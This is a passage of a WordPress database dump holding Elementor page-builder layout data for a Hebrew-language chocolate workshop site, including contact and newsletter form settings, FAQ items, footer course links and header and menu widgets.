"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b29f897\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"12851db1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28303ac7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"725a935c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"47ca8a3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3924078b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1038fd3f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"61c45866\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2e9becfa\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3a36cf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f6f68b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e887a15\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"374c003\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37447efb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"60d0c953\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"7dfe3d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"11596977\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53b6941c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6eef024e\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1026,208,'_elementor_version','0.4'),(1029,209,'_elementor_template_type','section'),(1030,209,'_elementor_edit_mode','builder'),(1031,210,'_elementor_template_type','page'),(1032,210,'_elementor_edit_mode','builder'),(1033,209,'_wp_page_template','default'),(1034,209,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false}]'),(1035,211,'_elementor_template_type','page'),(1036,211,'_elementor_edit_mode','builder'),(1037,211,'_wp_page_template','default'),(1038,211,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false}]'),(1039,209,'_elementor_version','0.4'),(1040,212,'_elementor_template_type','section'),(1041,212,'_elementor_edit_mode','builder'),(1042,213,'_elementor_template_type','page'),(1043,213,'_elementor_edit_mode','builder'),(1044,212,'_wp_page_template','default'),(1045,212,'_elementor_data','[{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\",\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(1046,214,'_elementor_template_type','page'),(1047,214,'_elementor_edit_mode','builder'),(1048,214,'_wp_page_template','default'),(1049,214,'_elementor_data','[{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\",\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"r